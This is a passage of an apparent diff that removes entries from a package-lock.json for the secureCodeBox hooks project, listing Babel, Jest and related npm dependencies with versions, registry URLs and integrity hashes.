"@securecodebox/hooks", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "@types/jest": "^29.5.14", - "jest": "^29.7.0", - "ts-jest": "^29.2.5" - } - }, - "../tests/integration": { - "name": "@securecodebox/integration-tests", - "version": "1.0.0", - "extraneous": true, - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.16.2" - }, - "devDependencies": { - "jest": "^27.0.3", - "prettier": "^2.2.1" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/@babel/helper-compilation-targets/node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.10.tgz", - "integrity": "sha512-UPYc3SauzZ3JGgj87GgZ89JVdC5dj0AoetR5Bw6wj4niittNyFh6+eOGonYvJ1ao6B8lEa3Q3klS7ADZ53bc5g==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/template": "^7.26.9", - "@babel/types": "^7.26.10" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.10.tgz", - "integrity": "sha512-6aQR2zGE/QFi8JpDLjUZEPYOs7+mhKXm86VaKFiLP35JQwQb6bwUE+XbvkH0EptsYhbNBSUGaUBLKqxH1xSgsA==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/types": "^7.26.10" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.26.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", - "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/code-frame": "^7.26.2", - "@babel/parser": "^7.26.9", - "@babel/types": "^7.26.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.26.10", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.10.tgz", - "integrity": "sha512-emqcG3vHrpxUKTrxcblR36dcrcoRDvKmnL/dCL6ZsHaShW80qxCAcNhzQZrpeM765VzEos+xOi4s+r4IXzTwdQ==", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, 